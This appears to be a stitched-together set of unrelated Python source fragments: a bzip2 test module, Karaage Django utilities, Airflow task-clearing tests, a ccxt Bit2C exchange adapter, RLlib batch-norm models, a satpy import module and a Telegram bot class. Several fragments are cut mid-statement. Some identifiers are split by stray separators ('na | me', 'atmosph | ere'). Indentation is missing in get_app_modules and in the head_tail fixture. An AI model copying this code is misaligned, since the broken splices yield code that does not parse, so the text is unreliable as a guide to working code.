chown www-data: -R "$BASE_FOLDER/"
""".format(
            config = config
        ), shell=True)
        self.run_argv = modules.loaded['file_bzip2'].run_argv

    def _assert_content(self, path, expected):
        """Check that the file at `path` holds exactly the `expected` bytes."""
        self.assertEqual(
            subprocess.check_output('cat "%s"' % path, shell=True),
            expected
        )

    def test_compress_decompress(self):
        """Round-trip a single fixture through decompress/compress cycles."""
        # Decompress and verify the fixture.
        self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]))
        self._assert_content(self.uncompressed[0], self.binstring[0])
        # Re-compress, then decompress and verify again.
        self.assertTrue(self.run_argv([self.uncompressed[0]]))
        self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]))
        self._assert_content(self.uncompressed[0], self.binstring[0])
        # Recompress while keeping the original file around.
        self.assertTrue(self.run_argv([self.uncompressed[0], '--keep']))
        # The original must still exist; then remove it.
        subprocess.check_call('stat -c %%a "%s"' % self.uncompressed[0], shell=True)
        subprocess.check_call('rm "%s"' % self.uncompressed[0], shell=True)
        # Final decompress-and-verify pass.
        self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]))
        self._assert_content(self.uncompressed[0], self.binstring[0])

    def test_compress_decompress_multiple(self):
        """Round-trip every fixture file."""
        for index, packed in enumerate(self.compressed):
            plain = self.uncompressed[index]
            # Decompress and verify.
            self.assertTrue(self.run_argv(["--decompress", packed]))
            self._assert_content(plain, self.binstring[index])
            # Re-compress, decompress and verify again.
            self.assertTrue(self.run_argv([plain]))
            self.assertTrue(self.run_argv(["--decompress", packed]))
            self._assert_content(plain, self.binstring[index])

    @log_capture()
    def test_already_exists(self, log_captured):
        """Existing output files are skipped with a warning."""
        self.assertTrue(self.run_argv(["--decompress", self.compressed[0], '--keep']))
        self._assert_content(self.uncompressed[0], self.binstring[0])
        # Decompressing again must skip: the target already exists.
        self.assertIsNone(self.run_argv(["--decompress", self.compressed[0]]))
        self.assertEqual(log_captured.records[-1].msg,
                         "File '%s' already exists, skipping decompressing" % self.uncompressed[0])
        # Compressing must skip: the archive already exists.
        self.assertIsNone(self.run_argv([self.uncompressed[0]]))
        self.assertEqual(log_captured.records[-1].msg,
                         "File '%s' already exists, skipping compressing" % self.compressed[0])

    @log_capture()
    def test_wrong_ext(self, log_captured):
        """Files without a known bzip2 suffix are not decompressed."""
        self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]))
        self._assert_content(self.uncompressed[0], self.binstring[0])
        # Decompressing the already-plain file must be skipped.
        self.assertIsNone(self.run_argv(["--decompress", self.uncompressed[0]]))
        self.assertEqual(log_captured.records[-1].msg,
                         "Unknown suffix, skipping decompressing")

    @log_capture()
    def test_unexistant(self, log_captured):
        """Missing input files are reported and skipped."""
        self.assertIsNone(self.run_argv(["--decompress", 'bogus']))
        self.assertEqual(log_captured.records[-1].msg,
                         "Skipping file '%s', check existance and permission" % 'bogus')
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
import datetime
import importlib
import warnings
import django
import six
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseRedirect, QueryDict
from django.shortcuts import render
from django.urls import reverse
from karaage.common.forms import CommentForm
from karaage.common.models import ADDITION, CHANGE, COMMENT, DELETION, LogEntry
from karaage.middleware.threadlocals import get_current_user
from karaage.plugins import BasePlugin
def get_date_range(request, default_start=None, default_end=None):
    """Extract a (start, end) date range from the request's GET parameters.

    'start'/'end' must be YYYY-MM-DD strings. A missing parameter yields
    the corresponding default (the last 90 days ending today when no
    defaults are passed). An unparsable value falls back to today minus
    90 days for 'start' and today for 'end' -- preserving the historical
    behaviour, which ignores the caller-supplied defaults in that case.

    Returns:
        A (start, end) tuple of datetime.date objects.
    """
    today = datetime.date.today()
    if default_start is None:
        default_start = today - datetime.timedelta(days=90)
    if default_end is None:
        default_end = today
    # The duplicated parse blocks are factored into a single helper.
    start = _parse_date_param(
        request, 'start', default_start, today - datetime.timedelta(days=90))
    end = _parse_date_param(request, 'end', default_end, today)
    return start, end


def _parse_date_param(request, key, default, fallback):
    """Parse request.GET[key] as a YYYY-MM-DD date.

    Returns `default` when the parameter is absent and `fallback` when it
    is present but malformed.
    """
    if key not in request.GET:
        return default
    try:
        years, months, days = request.GET[key].split('-')
        return datetime.datetime(int(years), int(months), int(days)).date()
    except ValueError:
        return fallback
def get_current_person():
    """Return the authenticated user for the current thread, or None."""
    user = get_current_user()
    if user is not None and user.is_authenticated:
        return user
    return None
class log():
    """Helpers for writing LogEntry records.

    Direct instantiation is deprecated; use the classmethod API:
    log.(add|change|field_change|delete|comment).
    """

    def __init__(self, user, obj, flag, message):
        warnings.warn("Calling karaage.common.log directly has been"
                      " deprecated. You should use the API "
                      "log.(add|change|field_change|delete|comment)",
                      DeprecationWarning)
        LogEntry.objects.log_object(obj, flag, message, user)

    @classmethod
    def add(cls, obj, message, user=None):
        """Record an object-creation log entry."""
        return LogEntry.objects.log_object(obj, ADDITION, message, user)

    @classmethod
    def change(cls, obj, message, user=None):
        """Record an object-change log entry."""
        return LogEntry.objects.log_object(obj, CHANGE, message, user)

    @classmethod
    def field_change(cls, obj, user=None, field=None, new_value=None):
        """Record a change of one field to a new value."""
        return LogEntry.objects.log_object(
            obj, CHANGE, 'Changed %s to %s' % (field, new_value), user)

    @classmethod
    def delete(cls, obj, message, user=None):
        """Record an object-deletion log entry."""
        return LogEntry.objects.log_object(obj, DELETION, message, user)

    @classmethod
    def comment(cls, obj, message, user=None):
        """Record a comment log entry."""
        return LogEntry.objects.log_object(obj, COMMENT, message, user)
def new_random_token():
    """Return an unpredictable 40-character hex token.

    Mixes a random 64-bit number with SECRET_KEY and hashes the result
    with SHA-1. The OS (hardware-based) random source is used when the
    platform provides one.
    """
    import random
    from hashlib import sha1
    # Prefer the system CSPRNG when available.
    if hasattr(random, 'SystemRandom'):
        randrange = random.SystemRandom().randrange
    else:
        randrange = random.randrange
    max_key = 18446744073709551616  # 2 << 63
    seed = six.u("%s%s") % (randrange(0, max_key), settings.SECRET_KEY)
    return sha1(seed.encode("ascii")).hexdigest()
def log_list(request, breadcrumbs, obj):
    """Redirect to the log list filtered to entries for `obj`."""
    params = QueryDict("", mutable=True)
    params['content_type'] = ContentType.objects.get_for_model(obj).pk
    params['object_id'] = obj.pk
    return HttpResponseRedirect(reverse('kg_log_list') + "?" + params.urlencode())
def add_comment(request, breadcrumbs, obj):
    """Render the add-comment form for `obj`; save and redirect on POST."""
    assert obj is not None
    assert obj.pk is not None
    form = CommentForm(
        data=request.POST or None, obj=obj,
        request=request, instance=None)
    if request.method == 'POST':
        # NOTE(review): the form is saved without an explicit is_valid()
        # call -- confirm CommentForm validates inside save().
        form.save()
        return HttpResponseRedirect(obj.get_absolute_url())
    return render(
        template_name='karaage/common/add_comment.html',
        context={
            'form': form, 'obj': obj,
            'breadcrumbs': breadcrumbs,
        },
        request=request)
def is_admin(request):
    """Return whether the requester is an authenticated admin.

    Always False when admin functionality is disabled via ADMIN_IGNORED.
    """
    if settings.ADMIN_IGNORED or not request.user.is_authenticated:
        return False
    return request.user.is_admin
def get_app_modules(na | me):
if django.VERSION < (1, 7):
for app in settings.INSTALLED_APPS:
try:
module_name = app + "." + name
module = importlib.import_module(module_name)
yield module
except ImportError:
pass
else:
from django.apps import apps
for config in apps.get_app_configs():
if isinstance(config, BasePlugin):
module_name = config.na | me + "." + name
module = importlib.import_module(module_name)
yield module
def get_urls(name):
    """Yield attribute *name* from each app's ``urls`` module that defines it."""
    for module in get_app_modules("urls"):
        value = getattr(module, name, None)
        if value is None:
            continue
        yield value
|
g_bag.get_dag('child_dag_1').get_dagrun(execution_date=day_2, session=session)
assert dagrun_0_1.state == State.QUEUED
assert dagrun_0_2.state == State.QUEUED
assert dagrun_1_1.state == State.QUEUED
assert dagrun_1_2.state == State.SUCCESS
def test_external_task_marker_future(dag_bag_ext):
    """
    Test clearing tasks with no end_date. This is the case when users clear tasks with
    Future, Downstream and Recursive selected.
    """
    first_date = DEFAULT_DATE
    second_date = DEFAULT_DATE + timedelta(days=1)
    tis_by_date = {
        first_date: run_tasks(dag_bag_ext, execution_date=first_date),
        second_date: run_tasks(dag_bag_ext, execution_date=second_date),
    }
    dag = dag_bag_ext.get_dag("dag_0")
    root_task = dag.get_task("task_a_0")
    # With end_date=None the clear extends across dag_0..dag_3 for both dates.
    clear_tasks(dag_bag_ext, dag, root_task, end_date=None)
    for ti in (
        tis_by_date[first_date]["task_a_0"],
        tis_by_date[first_date]["task_b_3"],
        tis_by_date[second_date]["task_b_3"],
    ):
        assert_ti_state_equal(ti, State.NONE)
def test_external_task_marker_exception(dag_bag_ext):
    """
    Clearing across multiple DAGs should raise AirflowException if more levels are being cleared
    than allowed by the recursion_depth of the first ExternalTaskMarker being cleared.
    """
    run_tasks(dag_bag_ext)
    dag = dag_bag_ext.get_dag("dag_0")
    start_task = dag.get_task("task_a_0")
    marker_task = dag.get_task("task_b_0")
    # Shrink the marker's recursion budget below the real chain depth.
    marker_task.recursion_depth = 2
    with pytest.raises(AirflowException, match="Maximum recursion depth 2"):
        clear_tasks(dag_bag_ext, dag, start_task)
@pytest.fixture
def dag_bag_cyclic():
    """
    Create a DagBag with DAGs having cyclic dependencies set up by ExternalTaskMarker and
    ExternalTaskSensor.

    dag_0: task_a_0 >> task_b_0
           ^                 |
           |                 |
    dag_1: |                 ---> task_a_1 >> task_b_1
           |                                      ^
           |                                      |
    dag_n: |                 ---> task_a_n >> task_b_n
           |                                      |
           -----------------------------------------------------

    Returns a factory so each test can choose its own cycle length (depth).
    """
    def _factory(depth: int) -> DagBag:
        # DagBag pointed at /dev/null so only explicitly bagged DAGs exist.
        dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
        dags = []
        # dag_0: a plain task feeding a marker that points into dag_1.
        with DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
            dags.append(dag)
            task_a_0 = DummyOperator(task_id="task_a_0")
            task_b_0 = ExternalTaskMarker(
                task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3
            )
            task_a_0 >> task_b_0
        # Middle dags: sensor waits on the previous dag's marker, and a marker
        # points at the next dag's sensor.
        for n in range(1, depth):
            with DAG(f"dag_{n}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
                dags.append(dag)
                task_a = ExternalTaskSensor(
                    task_id=f"task_a_{n}",
                    external_dag_id=f"dag_{n-1}",
                    external_task_id=f"task_b_{n-1}",
                )
                task_b = ExternalTaskMarker(
                    task_id=f"task_b_{n}",
                    external_dag_id=f"dag_{n+1}",
                    external_task_id=f"task_a_{n+1}",
                    recursion_depth=3,
                )
                task_a >> task_b
        # Create the last dag which loops back
        with DAG(f"dag_{depth}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
            dags.append(dag)
            task_a = ExternalTaskSensor(
                task_id=f"task_a_{depth}",
                external_dag_id=f"dag_{depth-1}",
                external_task_id=f"task_b_{depth-1}",
            )
            task_b = ExternalTaskMarker(
                task_id=f"task_b_{depth}",
                external_dag_id="dag_0",
                external_task_id="task_a_0",
                recursion_depth=2,
            )
            task_a >> task_b
        for dag in dags:
            dag_bag.bag_dag(dag=dag, root_dag=dag)
        return dag_bag
    return _factory
def test_external_task_marker_cyclic_deep(dag_bag_cyclic):
    """
    Tests clearing across multiple DAGs that have cyclic dependencies. AirflowException should be
    raised.
    """
    bag = dag_bag_cyclic(10)
    run_tasks(bag)
    dag = bag.get_dag("dag_0")
    first_task = dag.get_task("task_a_0")
    # A 10-deep cycle exceeds the recursion_depth=3 configured on the markers.
    with pytest.raises(AirflowException, match="Maximum recursion depth 3"):
        clear_tasks(bag, dag, first_task)
def test_external_task_marker_cyclic_shallow(dag_bag_cyclic):
    """
    Tests clearing across multiple DAGs that have cyclic dependencies shallower
    than recursion_depth
    """
    bag = dag_bag_cyclic(2)
    run_tasks(bag)
    dag = bag.get_dag("dag_0")
    first_task = dag.get_task("task_a_0")
    cleared = clear_tasks(bag, dag, first_task, dry_run=True)
    # Both tasks of dag_0, dag_1 and dag_2 should be cleared, nothing more.
    expected = [
        ("dag_{}".format(n), "task_{}_{}".format(letter, n))
        for n in range(3)
        for letter in ("a", "b")
    ]
    assert expected == sorted((ti.dag_id, ti.task_id) for ti in cleared)
@pytest.fixture
def dag_bag_multiple():
    """
    Create a DagBag containing two DAGs, linked by multiple ExternalTaskMarker.
    """
    dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
    daily_dag = DAG("daily_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
    agg_dag = DAG("agg_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
    dag_bag.bag_dag(dag=daily_dag, root_dag=daily_dag)
    dag_bag.bag_dag(dag=agg_dag, root_dag=agg_dag)
    # NOTE(review): "daily_tas" looks like a typo for "daily_task", but it is a
    # runtime task id and is referenced consistently below via
    # daily_task.task_id, so the wiring is coherent — confirm before renaming.
    daily_task = DummyOperator(task_id="daily_tas", dag=daily_dag)
    start = DummyOperator(task_id="start", dag=agg_dag)
    # 25 markers, each targeting the same daily task at a different (templated)
    # execution_date in the past.
    for i in range(25):
        task = ExternalTaskMarker(
            task_id=f"{daily_task.task_id}_{i}",
            external_dag_id=daily_dag.dag_id,
            external_task_id=daily_task.task_id,
            execution_date="{{ macros.ds_add(ds, -1 * %s) }}" % i,
            dag=agg_dag,
        )
        start >> task
    yield dag_bag
@pytest.mark.quarantined
@pytest.mark.backend("postgres", "mysql")
def test_clear_multiple_external_task_marker(dag_bag_multiple):
    """
    Test clearing a dag that has multiple ExternalTaskMarker.
    sqlite3 parser stack size is 100 lexical items by default so this puts a hard limit on
    the level of nesting in the sql. This test is intentionally skipped in sqlite.
    """
    agg = dag_bag_multiple.get_dag("agg_dag")
    last_date = None
    for offset in range(len(agg.tasks)):
        last_date = DEFAULT_DATE + timedelta(days=offset)
        run_tasks(dag_bag_multiple, execution_date=last_date)
    # There used to be some slowness caused by calling count() inside DAG.clear().
    # That has since been fixed. It should take no more than a few seconds to call
    # dag.clear() here.
    assert agg.clear(start_date=last_date, end_date=last_date, dag_bag=dag_bag_multiple) == 51
@pytest.fixture
def dag_bag_head_tail():
"""
Create a DagBag containing one DAG, with task "head" depending on task "tail" of the
previous execution_date.
20200501 20200502 20200510
+------+ +------+ +------+
| head | -->head | --> -->head |
| | | / | | | / / | | |
| v | / | v | / / | v |
| body | / | body | / ... / | body |
| | |/ | | |/ / | | |
| v / | v / / | v |
| tail/| | tail/| / | tail |
+------+ +------+ +------+
"""
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
with DAG("head_tail", start_date=DEFAULT_DATE, schedule_interval="@daily") as dag:
head = ExternalTaskSensor(
task_id='head',
external_dag_id=dag.dag_id,
external_task |
# -*- coding: utf-8 -*-
from ccxt.async.base.exchange import Exchange
import hashlib
class bit2c (Exchange):
    """ccxt adapter for Bit2C (https://www.bit2c.co.il), an Israeli exchange
    quoting markets against the NIS."""

    def describe(self):
        """Return the static exchange description (endpoints, markets, fees)
        merged over the base Exchange defaults."""
        return self.deep_extend(super(bit2c, self).describe(), {
            'id': 'bit2c',
            'name': 'Bit2C',
            'countries': 'IL',  # Israel
            'rateLimit': 3000,
            'hasCORS': False,
            'urls': {
                'logo': 'https://user-images.githubusercontent.com/1294454/27766119-3593220e-5ece-11e7-8b3a-5a041f6bcc3f.jpg',
                'api': 'https://www.bit2c.co.il',
                'www': 'https://www.bit2c.co.il',
                'doc': [
                    'https://www.bit2c.co.il/home/api',
                    'https://github.com/OferE/bit2c',
                ],
            },
            'api': {
                'public': {
                    'get': [
                        'Exchanges/{pair}/Ticker',
                        'Exchanges/{pair}/orderbook',
                        'Exchanges/{pair}/trades',
                    ],
                },
                'private': {
                    'post': [
                        'Account/Balance',
                        'Account/Balance/v2',
                        'Merchant/CreateCheckout',
                        'Order/AccountHistory',
                        'Order/AddCoinFundsRequest',
                        'Order/AddFund',
                        'Order/AddOrder',
                        'Order/AddOrderMarketPriceBuy',
                        'Order/AddOrderMarketPriceSell',
                        'Order/CancelOrder',
                        'Order/MyOrders',
                        'Payment/GetMyId',
                        'Payment/Send',
                    ],
                },
            },
            'markets': {
                'BTC/NIS': {'id': 'BtcNis', 'symbol': 'BTC/NIS', 'base': 'BTC', 'quote': 'NIS'},
                'BCH/NIS': {'id': 'BchNis', 'symbol': 'BCH/NIS', 'base': 'BCH', 'quote': 'NIS'},
                'LTC/NIS': {'id': 'LtcNis', 'symbol': 'LTC/NIS', 'base': 'LTC', 'quote': 'NIS'},
                'BTG/NIS': {'id': 'BtgNis', 'symbol': 'BTG/NIS', 'base': 'BTG', 'quote': 'NIS'},
            },
            'fees': {
                'trading': {
                    'maker': 0.5 / 100,
                    'taker': 0.5 / 100,
                },
            },
        })

    async def fetch_balance(self, params={}):
        """Fetch account balances via the private Balance/v2 endpoint and
        normalize them into ccxt's standard balance structure."""
        balance = await self.privatePostAccountBalanceV2()
        result = {'info': balance}
        currencies = list(self.currencies.keys())
        for i in range(0, len(currencies)):
            currency = currencies[i]
            account = self.account()
            if currency in balance:
                # e.g. 'AVAILABLE_BTC' holds the free amount, 'BTC' the total.
                available = 'AVAILABLE_' + currency
                account['free'] = balance[available]
                account['total'] = balance[currency]
                account['used'] = account['total'] - account['free']
            result[currency] = account
        return self.parse_balance(result)

    async def fetch_order_book(self, symbol, params={}):
        """Fetch and parse the public order book for *symbol*."""
        orderbook = await self.publicGetExchangesPairOrderbook(self.extend({
            'pair': self.market_id(symbol),
        }, params))
        return self.parse_order_book(orderbook)

    async def fetch_ticker(self, symbol, params={}):
        """Fetch the public ticker for *symbol* and map it to ccxt's ticker
        structure.

        NOTE(review): the mapping below assumes Bit2C's ticker fields are
        'h' = current bid, 'l' = current ask, 'll' = last trade, 'av' =
        average price, 'a' = base volume — confirm against the exchange docs.
        """
        ticker = await self.publicGetExchangesPairTicker(self.extend({
            'pair': self.market_id(symbol),
        }, params))
        timestamp = self.milliseconds()
        averagePrice = float(ticker['av'])
        baseVolume = float(ticker['a'])
        quoteVolume = baseVolume * averagePrice
        return {
            'symbol': symbol,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'high': None,
            'low': None,
            'bid': float(ticker['h']),
            'ask': float(ticker['l']),
            'vwap': None,
            'open': None,
            'close': None,
            'first': None,
            'last': float(ticker['ll']),
            'change': None,
            'percentage': None,
            'average': averagePrice,
            'baseVolume': baseVolume,
            'quoteVolume': quoteVolume,
            'info': ticker,
        }

    def parse_trade(self, trade, market=None):
        """Convert one raw trade dict into ccxt's unified trade structure."""
        # Exchange timestamps are in seconds; ccxt uses milliseconds.
        timestamp = int(trade['date']) * 1000
        symbol = None
        if market:
            symbol = market['symbol']
        return {
            'id': str(trade['tid']),
            'info': trade,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'symbol': symbol,
            'order': None,
            'type': None,
            'side': None,
            'price': trade['price'],
            'amount': trade['amount'],
        }

    async def fetch_trades(self, symbol, since=None, limit=None, params={}):
        """Fetch recent public trades for *symbol*."""
        market = self.market(symbol)
        response = await self.publicGetExchangesPairTrades(self.extend({
            'pair': market['id'],
        }, params))
        return self.parse_trades(response, market, since, limit)

    async def create_order(self, symbol, type, side, amount, price=None, params={}):
        """Place an order.

        Market orders use the AddOrderMarketPriceBuy/Sell endpoints; limit
        orders go to AddOrder with Price/Total/IsBid fields.
        """
        method = 'privatePostOrderAddOrder'
        order = {
            'Amount': amount,
            'Pair': self.market_id(symbol),
        }
        if type == 'market':
            # e.g. 'privatePostOrderAddOrderMarketPriceBuy'
            method += 'MarketPrice' + self.capitalize(side)
        else:
            order['Price'] = price
            order['Total'] = amount * price
            order['IsBid'] = (side == 'buy')
        result = await getattr(self, method)(self.extend(order, params))
        return {
            'info': result,
            'id': result['NewOrder']['id'],
        }

    async def cancel_order(self, id, symbol=None, params={}):
        """Cancel order *id*. The *symbol* and *params* arguments are accepted
        for interface compatibility but not forwarded."""
        return await self.privatePostOrderCancelOrder({'id': id})

    def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Build the request URL/headers/body; private calls are form-encoded
        with a nonce and HMAC-SHA512 signed (base64) using the API secret."""
        url = self.urls['api'] + '/' + self.implode_params(path, params)
        if api == 'public':
            url += '.json'
        else:
            self.check_required_credentials()
            nonce = self.nonce()
            query = self.extend({'nonce': nonce}, params)
            body = self.urlencode(query)
            signature = self.hmac(self.encode(body), self.encode(self.secret), hashlib.sha512, 'base64')
            headers = {
                'Content-Type': 'application/x-www-form-urlencoded',
                'key': self.apiKey,
                'sign': self.decode(signature),
            }
        return {'url': url, 'method': method, 'body': body, 'headers': headers}
|
import numpy as np
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.misc import SlimFC, normc_initializer as \
torch_normc_initializer
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.annotations import override
from ray.rllib.utils.framework import try_import_tf, try_import_torch
tf1, tf, tfv = try_import_tf()
torch, nn = try_import_torch()
class BatchNormModel(TFModelV2):
    """Example of a TFModelV2 that is built w/o using tf.keras.

    NOTE: This example does not work when using a keras-based TFModelV2 due
    to a bug in keras related to missing values for input placeholders, even
    though these input values have been provided in a forward pass through the
    actual keras Model.

    All Model logic (layers) is defined in the `forward` method (incl.
    the batch_normalization layers). Also, all variables are registered
    (only once) at the end of `forward`, so an optimizer knows which tensors
    to train on. A standard `value_function` override is used.
    """
    capture_index = 0

    def __init__(self, obs_space, action_space, num_outputs, model_config,
                 name):
        super().__init__(obs_space, action_space, num_outputs, model_config,
                         name)
        # Have we registered our vars yet (see `forward`)?
        self._registered = False

    @override(ModelV2)
    def forward(self, input_dict, state, seq_lens):
        """Build (first call) or reuse (AUTO_REUSE) the graph and compute
        logits; also stashes the value-head output for `value_function`."""
        last_layer = input_dict["obs"]
        hiddens = [256, 256]
        # AUTO_REUSE makes repeated forward passes share the same variables.
        with tf1.variable_scope("model", reuse=tf1.AUTO_REUSE):
            for i, size in enumerate(hiddens):
                last_layer = tf1.layers.dense(
                    last_layer,
                    size,
                    kernel_initializer=normc_initializer(1.0),
                    activation=tf.nn.tanh,
                    name="fc{}".format(i))
                # Add a batch norm layer
                last_layer = tf1.layers.batch_normalization(
                    last_layer,
                    training=input_dict["is_training"],
                    name="bn_{}".format(i))
            output = tf1.layers.dense(
                last_layer,
                self.num_outputs,
                kernel_initializer=normc_initializer(0.01),
                activation=None,
                name="out")
            # Value head shares the hidden trunk with the policy head.
            self._value_out = tf1.layers.dense(
                last_layer,
                1,
                kernel_initializer=normc_initializer(1.0),
                activation=None,
                name="vf")
        # Register trainable variables exactly once, after first graph build.
        if not self._registered:
            self.register_variables(
                tf1.get_collection(
                    tf1.GraphKeys.TRAINABLE_VARIABLES, scope=".+/model/.+"))
            self._registered = True
        return output, []

    @override(ModelV2)
    def value_function(self):
        """Return the (flattened) value branch output of the last forward pass."""
        return tf.reshape(self._value_out, [-1])
class KerasBatchNormModel(TFModelV2):
    """Keras version of above BatchNormModel with exactly the same structure.

    IMPORTANT NOTE: This model will not work with PPO due to a bug in keras
    that surfaces when having more than one input placeholder (here: `inputs`
    and `is_training`) AND using the `make_tf_callable` helper (e.g. used by
    PPO), in which auto-placeholders are generated, then passed through the
    tf.keras. models.Model. In this last step, the connection between 1) the
    provided value in the auto-placeholder and 2) the keras `is_training`
    Input is broken and keras complains.
    Use the above `BatchNormModel` (a non-keras based TFModelV2), instead.
    """
    def __init__(self, obs_space, action_space, num_outputs, model_config,
                 name):
        super().__init__(obs_space, action_space, num_outputs, model_config,
                         name)
        # Two inputs: the observation, plus a scalar bool that switches the
        # BatchNormalization layers between train and inference behavior.
        inputs = tf.keras.layers.Input(shape=obs_space.shape, name="inputs")
        is_training = tf.keras.layers.Input(
            shape=(), dtype=tf.bool, batch_size=1, name="is_training")
        last_layer = inputs
        hiddens = [256, 256]
        for i, size in enumerate(hiddens):
            label = "fc{}".format(i)
            last_layer = tf.keras.layers.Dense(
                units=size,
                kernel_initializer=normc_initializer(1.0),
                activation=tf.nn.tanh,
                name=label)(last_layer)
            # Add a batch norm layer
            last_layer = tf.keras.layers.BatchNormalization()(
                last_layer, training=is_training[0])
        # Policy-logits head.
        output = tf.keras.layers.Dense(
            units=self.num_outputs,
            kernel_initializer=normc_initializer(0.01),
            activation=None,
            name="fc_out")(last_layer)
        # Value-function head sharing the same hidden trunk.
        value_out = tf.keras.layers.Dense(
            units=1,
            kernel_initializer=normc_initializer(0.01),
            activation=None,
            name="value_out")(last_layer)
        self.base_model = tf.keras.models.Model(
            inputs=[inputs, is_training], outputs=[output, value_out])
        self.register_variables(self.base_model.variables)

    @override(ModelV2)
    def forward(self, input_dict, state, seq_lens):
        """Run obs (and the is_training flag) through the keras model."""
        out, self._value_out = self.base_model(
            [input_dict["obs"], input_dict["is_training"]])
        return out, []

    @override(ModelV2)
    def value_function(self):
        """Return the (flattened) value branch output of the last forward pass."""
        return tf.reshape(self._value_out, [-1])
class TorchBatchNormModel(TorchModelV2, nn.Module):
    """Example of a TorchModelV2 using batch normalization."""
    capture_index = 0

    def __init__(self, obs_space, action_space, num_outputs, model_config,
                 name, **kwargs):
        TorchModelV2.__init__(self, obs_space, action_space, num_outputs,
                              model_config, name)
        nn.Module.__init__(self)
        layers = []
        prev_layer_size = int(np.product(obs_space.shape))
        self._logits = None
        # Create layers 0 to second-last.
        # (Note: activation is ReLU here, whereas the TF variants use tanh.)
        for size in [256, 256]:
            layers.append(
                SlimFC(
                    in_size=prev_layer_size,
                    out_size=size,
                    initializer=torch_normc_initializer(1.0),
                    activation_fn=nn.ReLU))
            prev_layer_size = size
            # Add a batch norm layer.
            layers.append(nn.BatchNorm1d(prev_layer_size))
        # Policy-logits head.
        self._logits = SlimFC(
            in_size=prev_layer_size,
            out_size=self.num_outputs,
            initializer=torch_normc_initializer(0.01),
            activation_fn=None)
        # Value-function head sharing the same hidden trunk.
        self._value_branch = SlimFC(
            in_size=prev_layer_size,
            out_size=1,
            initializer=torch_normc_initializer(1.0),
            activation_fn=None)
        self._hidden_layers = nn.Sequential(*layers)
        # Cached trunk output, set by `forward` and read by `value_function`.
        self._hidden_out = None

    @override(ModelV2)
    def forward(self, input_dict, state, seq_lens):
        # Set the correct train-mode for our hidden module (only important
        # b/c we have some batch-norm layers).
        self._hidden_layers.train(mode=input_dict.get("is_training", False))
        self._hidden_out = self._hidden_layers(input_dict["obs"])
        logits = self._logits(self._hidden_out)
        return logits, []

    @override(ModelV2)
    def value_function(self):
        assert self._hidden_out is not None, "must call forward first!"
        return torch.reshape(self._value_branch(self._hidden_out), [-1])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Modifier classes and other related utilities."""
# file deepcode ignore W0611: Ignore unused imports in init module
from .base import ModifierBase # noqa: F401, isort: skip
from .atmosph | ere import CO2Cor | rector # noqa: F401
from .atmosphere import PSPAtmosphericalCorrection # noqa: F401
from .atmosphere import PSPRayleighReflectance # noqa: F401
from .geometry import EffectiveSolarPathLengthCorrector # noqa: F401
from .geometry import SunZenithCorrector # noqa: F401
from .spectral import NIREmissivePartFromReflectance # noqa: F401
from .spectral import NIRReflectance # noqa: F401
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2016
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module conta | ins the classes that represent Telegram
InlineQueryResultCachedVideo"""
from telegram import InlineQueryResult, InlineKeyboardMarkup, InputMessageContent
class InlineQueryResultCachedVideo(InlineQueryResult):
    """Represents an inline query result of type 'video' backed by a video
    file already stored on the Telegram servers (referenced by file id).

    Optional attributes are only set when a truthy value is supplied.
    """

    def __init__(self,
                 id,
                 video_file_id,
                 title,
                 description=None,
                 caption=None,
                 reply_markup=None,
                 input_message_content=None,
                 **kwargs):
        """Initialize the result; the base class stores type ('video') and id."""
        # Required
        super(InlineQueryResultCachedVideo, self).__init__('video', id)
        self.video_file_id = video_file_id
        self.title = title
        # Optionals
        if description:
            self.description = description
        if caption:
            self.caption = caption
        if reply_markup:
            self.reply_markup = reply_markup
        if input_message_content:
            self.input_message_content = input_message_content

    @staticmethod
